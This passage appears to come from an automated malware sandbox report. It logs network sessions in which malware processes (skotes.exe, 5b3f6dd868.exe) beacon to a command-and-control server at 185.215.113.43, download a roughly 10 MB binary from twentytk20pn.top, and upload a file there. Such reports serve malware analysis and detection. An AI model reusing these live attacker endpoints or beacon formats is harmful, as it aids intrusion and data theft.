                                                                                                                                                              Data Ascii: qvf\/u\/iUQSfvOf+Ww+0S\/8APD\/l6\/Dr\/L8RTPLyz+T8n+\/L68\/5\/wAKm+TzEZPk\/d\/8tP8AXxW\/P\/1\/p7VDIvmtv2RvmM\/u5M\/5\/wA+1Hv\/AN38QIf+Wb\/+ROn\/AG6df8\/jimfxbf8AXQ+b\/wA8v9Qev+fr3q55kzSOmcCST\/Vx\/wDLH6f55+opkjJ8\/wAn\/TKX\/D6+\/JqfZ+f4f8E6CtJG
                                                                                                                                                              Dec 18, 2024 11:47:58.170522928 CET27192OUTData Raw: 77 65 58 38 59 64 45 6b 38 51 58 48 67 50 78 64 72 30 48 68 71 50 34 57 5c 2f 45 4b 4a 37 6a 78 39 6f 5c 2f 78 59 54 77 6a 34 54 2b 47 79 36 33 4e 65 48 54 6f 44 34 7a 2b 46 70 6b 2b 4d 50 5c 2f 41 41 6d 4d 73 5a 30 54 77 37 35 58 5c 2f 43 76 74
                                                                                                                                                              Data Ascii: weX8YdEk8QXHgPxdr0HhqP4W\/EKJ7jx9o\/xYTwj4T+Gy63NeHToD4z+Fpk+MP\/AAmMsZ0Tw75X\/CvtSgl8ROtyPe4NI0OOMxJouleWV2MDZwO0ijPErujSS8MeZHY4JHSoF8J+DQ6yJ4f0S1kQhke30mwR0b1VlgDKecZUjrjvX6Fwr4G5xwLha2B4P46xmVYTMOJM74lzeisryzFPHYnOsbiMU8Iq2LwdatSwWW0q9LA5Z
                                                                                                                                                              Dec 18, 2024 11:48:00.737641096 CET164INHTTP/1.1 200 OK
                                                                                                                                                              server: nginx/1.22.1
                                                                                                                                                              date: Wed, 18 Dec 2024 10:48:00 GMT
                                                                                                                                                              content-type: text/html; charset=utf-8
                                                                                                                                                              content-length: 26
                                                                                                                                                              Data Raw: 57 35 49 30 34 52 4a 67 38 48 38 7a 6d 78 39 67 31 37 33 34 35 31 38 38 38 30
                                                                                                                                                              Data Ascii: W5I04RJg8H8zmx9g1734518880


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              12192.168.2.649925185.215.113.43806044C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Dec 18, 2024 11:47:59.972187996 CET184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Host: 185.215.113.43
                                                                                                                                                              Content-Length: 31
                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                              Data Raw: 64 31 3d 31 30 31 36 38 37 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                              Data Ascii: d1=1016879001&unit=246122658369
                                                                                                                                                              Dec 18, 2024 11:48:01.745049953 CET193INHTTP/1.1 200 OK
                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                              Date: Wed, 18 Dec 2024 10:48:01 GMT
                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 4 <c>0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              13192.168.2.649928185.185.71.170803220C:\Users\user\AppData\Local\Temp\1016878001\5b3f6dd868.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Dec 18, 2024 11:48:01.102849960 CET126OUTGET /WEIsmPfDcpBFJozngnYN1734366322?argument=W5I04RJg8H8zmx9g1734518880 HTTP/1.1
                                                                                                                                                              Host: home.twentytk20pn.top
                                                                                                                                                              Accept: */*
                                                                                                                                                              Dec 18, 2024 11:48:02.629292011 CET1236INHTTP/1.1 200 OK
                                                                                                                                                              server: nginx/1.22.1
                                                                                                                                                              date: Wed, 18 Dec 2024 10:48:02 GMT
                                                                                                                                                              content-type: application/octet-stream
                                                                                                                                                              content-length: 10816560
                                                                                                                                                              content-disposition: attachment; filename="wmhxbWrMmpOSXnEQUlz;"
                                                                                                                                                              last-modified: Mon, 16 Dec 2024 16:25:22 GMT
                                                                                                                                                              cache-control: no-cache
                                                                                                                                                              etag: "1734366322.858812-10816560-3400407440"
                                                                                                                                                              Data Raw: d5 59 3c ac 4f c5 f6 d3 51 7e 47 47 26 fc 67 8e 84 c9 d0 b9 c8 1a b5 f2 9f 36 58 4e 2a 47 78 b3 71 d6 90 99 2c 75 71 ee 05 07 6f e4 46 9c 81 25 65 1e b9 5c 4c cd 26 06 a2 8a 7f f2 65 9e 16 dd 0a 62 a6 54 b4 af c9 89 f9 fa 9d 0d e0 ee 45 13 e3 62 b4 7a 27 ea 09 83 39 68 2b 57 d4 60 b5 5e e3 8d 8a ca f3 0f 65 59 61 a9 31 84 ec 75 18 9f 24 5a b0 43 dc a9 88 a2 32 72 8c 21 0b 74 3a 35 c1 bb ab 53 27 66 6a 20 e9 40 bb 35 77 dc 6b 55 70 51 7b b4 f9 80 55 0a bb 5b 04 23 b9 54 94 13 ce 2c 0f 64 c3 37 11 71 7d c1 39 1d bd 7e 1d a8 c2 76 08 b7 bb e4 83 f9 ca ca 3f d4 dc a1 68 0b fd 09 4e df f0 a3 4b ae ec 74 e9 a6 d0 f3 8f 73 8f bf ae 9d b3 e6 e5 e8 01 1a e2 90 67 05 cf 14 df 94 91 9a ac 00 db 92 f7 18 9e cd ca 55 e2 d5 d7 f2 87 f7 fa 3e f6 0f 54 99 fb 85 6f 27 8f 0b 94 d4 df 07 de d7 fd d7 24 7d 3b e8 61 d3 13 51 b5 02 12 b2 41 76 6e ac e5 f8 d0 76 a2 58 a0 af b0 ed e4 17 7d e1 24 1c 2f d5 3b 76 8d 8f 0c ad 07 bf 79 f7 c3 7c ae 13 ae 2d b2 54 c1 39 70 46 45 22 5c aa 6d 59 19 8b e5 22 88 83 18 44 c0 92 bf b1 [TRUNCATED]
                                                                                                                                                              Data Ascii: Y<OQ~GG&g6XN*Gxq,uqoF%e\L&ebTEbz'9h+W`^eYa1u$ZC2r!t:5S'fj @5wkUpQ{U[#T,d7q}9~v?hNKtsgU>To'$};aQAvnvX}$/;vy|-T9pFE"\mY"D7k*amD}?@ZY m>]De!cYJ<vG}%o$QWP8.jxx%_xHVF*C:\Y<,8/w"QQt4ep\6OC)['[VFdN_btA9AF]"e$9&-;( NGU1ht)#i$00*_W~W<"]::Uxw[|yJ~n7isY2_(q8""~@/t1@"n6]rtYukb.]PxC3l&f-KMU;5^>>?eRL?#14rYlG(~ {9Ps!jRn@f^KI/DSLKs4`dX/iwo\I@$
                                                                                                                                                              Dec 18, 2024 11:48:02.629312992 CET224INData Raw: f4 94 2e 6b 10 0a 2a 7d 78 3d a2 5d 2e 64 71 a5 1c fe 68 57 df 5f 96 f6 4c 28 9f 74 29 e4 0e 1d 56 23 c2 6c 8a c0 b4 eb 62 28 4c ee 7b 5a c4 2f e5 ef 72 84 32 e9 e1 08 27 06 4a 55 a3 38 47 7e b6 98 46 90 01 62 04 56 b0 f0 70 df a4 19 39 28 eb a8
                                                                                                                                                              Data Ascii: .k*}x=].dqhW_L(t)V#lb(L{Z/r2'JU8G~FbVp9(C4.BqN%7aNQ4/2M]ur"sTJj6(kD8ctTBHUE:zm[Y264#*rGSL
                                                                                                                                                              Dec 18, 2024 11:48:02.629441977 CET1236INData Raw: 5a 9a 9b 85 e6 db f7 f5 55 73 a5 27 d3 b4 54 e4 77 0d e7 83 22 4e c1 4d f8 e4 af 4c 0b ab 1a 54 ad 8d 16 6f af 43 78 89 39 0b bb 8c 4d ba 09 8b e5 dc 59 48 e6 45 66 4b 7d 51 80 62 76 3c 15 88 32 55 6c 9a 26 e5 6a d2 b3 03 36 54 bc f5 6d 5a 86 9c
                                                                                                                                                              Data Ascii: ZUs'Tw"NMLToCx9MYHEfK}Qbv<2Ul&j6TmZJododF<J%^n?YBWg>{96fr]:,)&2/u|!|^X~qV(TkYqK#sgIfW=|@
                                                                                                                                                              Dec 18, 2024 11:48:02.629498005 CET1236INData Raw: 61 f7 f8 f3 fd 77 21 5f 29 8c ce 3f 9d 2d 90 92 87 6a 25 12 2a ff 4d 26 76 bd 71 86 ba ea 9c 89 13 01 98 9d 0e f3 98 18 94 4f 48 59 58 fa 41 d0 0a 1a c1 86 e0 75 a0 61 ec 3f c9 d1 c5 a8 35 9b 39 6c 22 0d c2 5c f7 0a 72 d9 cc a8 49 29 52 0a 1e 60
                                                                                                                                                              Data Ascii: aw!_)?-j%*M&vqOHYXAua?59l"\rI)R`]Pgg{_''VmA!!ICT0aWJ%rt,@k4M{F>#rM@d[P816\zncrSc
                                                                                                                                                              Dec 18, 2024 11:48:02.629509926 CET1236INData Raw: de 94 9a b9 05 e2 22 53 b1 34 6d 3e af e5 be c2 be a5 d9 d2 98 61 ec 6d 1e 76 a9 d9 8b 95 47 da 2e 24 aa aa 52 b9 f9 e5 43 7b 82 ae 34 e5 4d 68 de 13 fb 1f 8f bc 44 8e 32 b7 b3 5f 61 f6 1b dc e0 73 07 be 09 c6 34 2d b0 c4 00 28 ea 59 e2 32 47 ca
                                                                                                                                                              Data Ascii: "S4m>amvG.$RC{4MhD2_as4-(Y2GG,xyh[`|hZ:zs;l=7ZGa|cxgs.4VjHEO!ppU'c_^tu\&ByAOV<S&vFex8on2T7k'v"y(`dF
                                                                                                                                                              Dec 18, 2024 11:48:02.629523039 CET1236INData Raw: f2 c0 82 16 f1 6b 0c a9 91 33 89 fc bd 10 25 32 90 22 64 4b 1b 92 0b 3f 7b 31 7c 0e 65 c8 0e 55 60 0a d1 80 4a 31 81 82 7b b1 74 ae 14 04 90 ba 37 09 ac 60 68 4b e6 14 da 7f 96 0c 64 ad a5 c7 fc 17 44 48 38 22 8c 71 19 43 eb fc fd 0f 33 6f 40 be
                                                                                                                                                              Data Ascii: k3%2"dK?{1|eU`J1{t7`hKdDH8"qC3o@'LW0rfq>Qr_sn%5u({4`zR!|OjDT!e,Uy"6E[CyG7ov97b$,Zq]C{F[Y2Mov\0ObC
                                                                                                                                                              Dec 18, 2024 11:48:02.629642963 CET1236INData Raw: 40 a5 1f 4f 95 9a 8b e0 bc 67 f6 67 41 91 95 bb 6b f0 ec 1f aa b9 89 b8 a2 22 d2 1d dd 8b 2e 3b 77 8b 06 19 4d 10 88 6a 43 d8 ce 00 45 c2 67 ac b8 bf 8f dd 12 6f cd 03 0b f0 88 45 d7 62 0a 3c 24 d8 73 b6 7d c1 b8 da a2 63 38 29 b7 e6 e1 71 7e 22
                                                                                                                                                              Data Ascii: @OggAk".;wMjCEgoEb<$s}c8)q~"cjQJh#V7pgcxy"]l~zi6(wLbLTY!cjz0qa{lZMpJ1d]NJNq%}=DEN
                                                                                                                                                              Dec 18, 2024 11:48:02.629657030 CET1236INData Raw: e0 09 ea f0 b6 44 d0 83 b0 f3 f5 ad cc 13 ba 6e dd 63 d1 cb 2e 74 9b 94 f7 ed a9 45 6d 38 76 12 7b 4a 8b 05 24 99 e0 4f 22 72 30 9b d1 48 df e1 42 00 4a 3c e4 ce 66 22 5e 5f 9e 0a 4e 5f ab 13 28 dc 11 69 50 77 1b d8 a0 bb 9e 15 97 3a 95 25 21 5f
                                                                                                                                                              Data Ascii: Dnc.tEm8v{J$O"r0HBJ<f"^_N_(iPw:%!_m2I^_}6@T Ui'K/"vV>tCoCdj@^vpF)u\;TU_?A{1}^3A+<6L`Mg3/NL
                                                                                                                                                              Dec 18, 2024 11:48:02.629781961 CET1236INData Raw: 58 3f 21 25 9e bb e6 8b 05 1b 46 74 bf 5f b0 b1 31 4c fe 83 ed 76 9e 1d 2f dd 18 fe a2 93 40 8a ea 63 7e cd 2b d7 6e 8c e1 d3 ed f7 4e f9 99 f1 74 b4 cd 0b 57 3a f8 d1 38 cc 7e 14 b3 5d 0c 21 6e 3e 58 0b 36 e6 6b a4 ff 24 15 59 89 db bd a9 77 cf
                                                                                                                                                              Data Ascii: X?!%Ft_1Lv/@c~+nNtW:8~]!n>X6k$Yw%ro4&)rL</'Q$1G1{%Gy]9yQH#-+A6I=Fzh8)~LyASkkQoS![<Y?h53)8Ql
                                                                                                                                                              Dec 18, 2024 11:48:02.629795074 CET1236INData Raw: 48 17 6e 58 55 8a d9 f8 50 57 bb 1b a4 d4 08 a8 af 8d f4 32 e8 e0 2c 18 ac 16 cd f3 60 51 1c d1 77 89 5d 2b 51 52 48 09 4b 12 d7 de 36 71 e1 15 d3 af c1 a2 12 55 12 79 93 c9 f0 f0 86 22 89 73 8f eb b4 09 e4 6e 05 5c 4a c7 ed 27 3a 2c 7b a2 5b 67
                                                                                                                                                              Data Ascii: HnXUPW2,`Qw]+QRHK6qUy"sn\J':,{[g4sdbUZXaD_IBIG:JX7$vAiulee''>2kAlk=u0MK:Ihqx)84k #I.45H'm{r=?-d
                                                                                                                                                              Dec 18, 2024 11:48:02.749134064 CET1236INData Raw: 32 a1 d0 7e ad 65 2c 79 4c c7 35 7b ce 48 b9 b6 35 82 6c bf 1f 8d 9e 8f 9d 82 75 63 d8 d7 f4 11 87 91 e3 4b 68 a7 24 2e b5 69 8e c7 cd d6 ba db ec e3 23 c4 c6 fc a3 31 be 9d 39 9b 7c 1d d8 10 d0 f2 f2 78 8d e0 95 2c e2 0b 5c 7a 29 13 10 89 51 1e
                                                                                                                                                              Data Ascii: 2~e,yL5{H5lucKh$.i#19|x,\z)QIRa# E}vt{1&(YS%j.CHoZ;.FJC4ud+5MkE(*<j)k"($@Yt\THW//cs(_gz


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              14192.168.2.649935185.215.113.43806044C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Dec 18, 2024 11:48:03.488733053 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Host: 185.215.113.43
                                                                                                                                                              Content-Length: 4
                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                              Data Raw: 73 74 3d 73
                                                                                                                                                              Data Ascii: st=s
                                                                                                                                                              Dec 18, 2024 11:48:04.827469110 CET219INHTTP/1.1 200 OK
                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                              Date: Wed, 18 Dec 2024 10:48:04 GMT
                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Refresh: 0; url = Login.php
                                                                                                                                                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 1 0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              15192.168.2.649946185.215.113.43806044C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Dec 18, 2024 11:48:06.465833902 CET314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Host: 185.215.113.43
                                                                                                                                                              Content-Length: 160
                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                              Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 33 32 45 37 31 42 38 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                                                                                                              Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B32E71B85182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                                                                                                              Dec 18, 2024 11:48:07.795404911 CET196INHTTP/1.1 200 OK
                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                              Date: Wed, 18 Dec 2024 10:48:07 GMT
                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 7 <c><d>0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              16192.168.2.649953185.215.113.43806044C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Dec 18, 2024 11:48:09.609209061 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Host: 185.215.113.43
                                                                                                                                                              Content-Length: 4
                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                              Data Raw: 73 74 3d 73
                                                                                                                                                              Data Ascii: st=s


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              17192.168.2.649959185.215.113.43806044C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Dec 18, 2024 11:48:11.257000923 CET314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Host: 185.215.113.43
                                                                                                                                                              Content-Length: 160
                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                              Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 33 32 45 37 31 42 38 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                                                                                                              Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B32E71B85182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                                                                                                              Dec 18, 2024 11:48:12.589101076 CET196INHTTP/1.1 200 OK
                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                              Date: Wed, 18 Dec 2024 10:48:12 GMT
                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 7 <c><d>0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              18192.168.2.649968185.215.113.43806044C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Dec 18, 2024 11:48:14.365612030 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Host: 185.215.113.43
                                                                                                                                                              Content-Length: 4
                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                              Data Raw: 73 74 3d 73
                                                                                                                                                              Data Ascii: st=s
                                                                                                                                                              Dec 18, 2024 11:48:15.747179031 CET219INHTTP/1.1 200 OK
                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                              Date: Wed, 18 Dec 2024 10:48:15 GMT
                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Refresh: 0; url = Login.php
                                                                                                                                                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 1 0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              19192.168.2.649975185.215.113.43806044C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Dec 18, 2024 11:48:17.385404110 CET314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Host: 185.215.113.43
                                                                                                                                                              Content-Length: 160
                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                              Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 33 32 45 37 31 42 38 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                                                                                                              Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B32E71B85182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                                                                                                              Dec 18, 2024 11:48:18.716049910 CET196INHTTP/1.1 200 OK
                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                              Date: Wed, 18 Dec 2024 10:48:18 GMT
                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 7 <c><d>0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              20192.168.2.649984185.215.113.43806044C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Dec 18, 2024 11:48:20.471832037 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Host: 185.215.113.43
                                                                                                                                                              Content-Length: 4
                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                              Data Raw: 73 74 3d 73
                                                                                                                                                              Data Ascii: st=s
                                                                                                                                                              Dec 18, 2024 11:48:21.815754890 CET219INHTTP/1.1 200 OK
                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                              Date: Wed, 18 Dec 2024 10:48:21 GMT
                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Refresh: 0; url = Login.php
                                                                                                                                                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 1 0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              21192.168.2.649993185.215.113.43806044C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Dec 18, 2024 11:48:23.444755077 CET314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Host: 185.215.113.43
                                                                                                                                                              Content-Length: 160
                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                              Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 33 32 45 37 31 42 38 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                                                                                                              Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B32E71B85182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                                                                                                              Dec 18, 2024 11:48:24.793823957 CET196INHTTP/1.1 200 OK
                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                              Date: Wed, 18 Dec 2024 10:48:24 GMT
                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 7 <c><d>0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              22192.168.2.649999185.185.71.170803220C:\Users\user\AppData\Local\Temp\1016878001\5b3f6dd868.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Dec 18, 2024 11:48:25.539330959 CET645OUTPOST /v1/upload.php HTTP/1.1
                                                                                                                                                              Host: twentytk20pn.top
                                                                                                                                                              Accept: */*
                                                                                                                                                              Content-Length: 463
                                                                                                                                                              Content-Type: multipart/form-data; boundary=------------------------rMax4SAkNHGr8ofaH0KIJh
                                                                                                                                                              Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 72 4d 61 78 34 53 41 6b 4e 48 47 72 38 6f 66 61 48 30 4b 49 4a 68 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 58 75 6d 75 64 65 70 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a ec ce e5 cd 8e e5 b5 10 5d e2 f4 eb ea 90 8f dc 72 7a 3d ed f5 5a d9 6b 67 27 2c 97 d4 63 aa dc 23 a9 5e f3 14 b1 82 8b d1 24 17 23 8e 6c 3e cf aa 12 99 a8 fc 7b 02 4c 19 6e 5c 01 0c 09 2a ae 80 77 8b a9 a1 1d 44 bb d5 b6 23 d0 60 b4 3a 82 ac 3a ec 8d bb 2a 3b 18 c9 72 13 65 f2 68 45 f9 53 59 d4 78 1f 66 97 56 e4 41 db 86 9f 04 6f 4e 2a 9b 6d 1c 92 6d bb 7c 2f 10 63 0e 94 0e 26 0c f2 9c f8 55 3a f6 b0 8a 27 a4 3b 1e 35 94 af c7 55 b2 cf 0d 32 f5 75 89 42 cd b5 52 50 c0 b2 44 2b a6 bc e8 8f 72 88 12 3f c1 f4 ee ca 09 dc bd f5 [TRUNCATED]
                                                                                                                                                              Data Ascii: --------------------------rMax4SAkNHGr8ofaH0KIJhContent-Disposition: form-data; name="file"; filename="Xumudep.bin"Content-Type: application/octet-stream]rz=Zkg',c#^$#l>{Ln\*wD#`::*;rehESYxfVAoN*mm|/c&U:';5U2uBRPD+r?&}*t`S~yFFXK1dYk4>Mp1r*.r~--------------------------rMax4SAkNHGr8ofaH0KIJh--
                                                                                                                                                              Dec 18, 2024 11:48:26.873657942 CET255INHTTP/1.1 200 OK
                                                                                                                                                              server: nginx
                                                                                                                                                              date: Wed, 18 Dec 2024 10:48:26 GMT
                                                                                                                                                              content-type: text/plain; charset=utf-8
                                                                                                                                                              content-length: 2
                                                                                                                                                              x-ratelimit-limit: 30
                                                                                                                                                              x-ratelimit-remaining: 29
                                                                                                                                                              x-ratelimit-reset: 1734520707
                                                                                                                                                              etag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc"
                                                                                                                                                              Data Raw: 4f 4b
                                                                                                                                                              Data Ascii: OK


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              23192.168.2.650004185.215.113.43806044C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Dec 18, 2024 11:48:26.557884932 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
